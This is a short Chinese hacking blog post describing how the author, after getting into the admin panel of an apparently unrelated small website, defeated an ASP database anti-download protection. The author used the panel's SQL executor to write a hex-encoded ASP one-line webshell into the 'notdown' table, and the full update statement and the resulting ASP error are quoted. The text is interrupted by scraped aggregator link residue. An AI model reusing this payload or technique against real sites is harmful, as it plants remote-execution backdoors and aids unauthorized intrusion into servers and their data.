现在很多程序为了防止数据库被非法下载,就把数据库后缀改成asp 的.. 可是利用迅雷等工具依然可以
搞定, 而且一些地方过滤不严的. 可以直接插马搞定数据库.
今天搞了一个小站的后台,正愁没办法拿webshell.. 数据库也是传说中的asp 的.. notdown 表作怪..
擦.. 添加了个一句话管理员进去.. 总是提示
Active Server Pages, ASP 0116 (0x80004005)
Script. 块缺少脚本关闭标记(% >),
也可以这样搞定asp防下载
,电脑资料
《也可以这样搞定asp防下载》(http://meiwen.anslib.com)。百度一下,寻找突破的方法.. lake2大牛的一句话点醒了我
正好天不亡哥,后台有个sql 数据执行的地方..
执行语句把notdown 表中的二进制数据给替换掉... 呵呵..
update XXXX set notdown=0x3C2565786563757465287265717565737428226C222929253E
再次打开数据库... 成功出现了乱码..!